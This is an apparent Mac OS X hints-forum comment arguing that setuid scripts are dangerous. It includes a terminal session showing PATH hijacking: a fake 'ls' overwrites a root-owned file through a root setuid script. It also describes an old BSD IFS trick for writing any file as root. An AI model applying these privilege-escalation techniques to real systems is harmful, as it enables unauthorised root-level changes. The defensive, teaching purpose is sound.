Submit Hint Search The Forums LinksStatsPollsHeadlinesRSS
14,000 hints and counting!


Click here to return to the 'Potential warning: 10.3.9 disables SUID/SGID flag' hint
The following comments are owned by whoever posted them. This site is not responsible for what they say.
Potential warning: 10.3.9 disables SUID/SGID flag
Authored by: jeremyp on Apr 19, '05 12:18:43PM
Allowing setuid scripts is extremely dangerous. Look at the following session

jeremyp@titania:test$/bin/ls -l
total 24
-rw-r--r--  1 root     staff  11 19 Apr 16:40 foo.txt
-rwxr-xr-x  1 jeremyp  staff  23 19 Apr 16:29 ls
-rwsr-xr-x  1 root     staff  14 19 Apr 16:28 mysh
jeremyp@titania:test$more foo.txt
not hacked
jeremyp@titania:test$echo $PATH
.:/Developer/qt/bin:/Users/jeremyp/unix/bin:/bin:/sbin:/usr/bin:/usr/sbin
:/sbin:/usr/sbin:/usr/local/bin:/Library/MySQL/bin:/usr/X11R6/bin:/opt/local/bin
jeremyp@titania:test$more ls
echo "hacked" >foo.txt
jeremyp@titania:test$more mysh
#!/bin/sh

ls
jeremyp@titania:test$mysh
jeremyp@titania:test$more foo.txt
hacked

What is happening here?

I'm logged in as jeremyp and although I'm using 10.3.9 I have the flag set that disables the new behaviour.

In the directory I have a file called foo.txt which is owned by root and not writeable by me (jeremyp). There is also a root setuid script which I am going to use to compromise foo.txt. Assume somebody else set both of these up. I cat the setuid script looking for a suitable command to attack and find it makes use of ls so I set my path to look in . first and create an alternative version of ls that performs my skulduggery. Then I run the setuid script and hey presto, the read only file is hacked.

Obviously, in real life I could and should defensively program the setuid script so that it is not vulnerable, but there may be other less obvious holes. At University, for instance, we discovered that, in BSD 4.2 sh if you changed the IFS variable to contain a "p", the word "export" looked like "ex ort" which meant that virtually any script you could name, setuid or otherwise, started with an invocation of a text editor. In a root setuid script that meant you had the ability to write to any file you like on the system.

Edit: Added line break...

[ Reply to This | # ]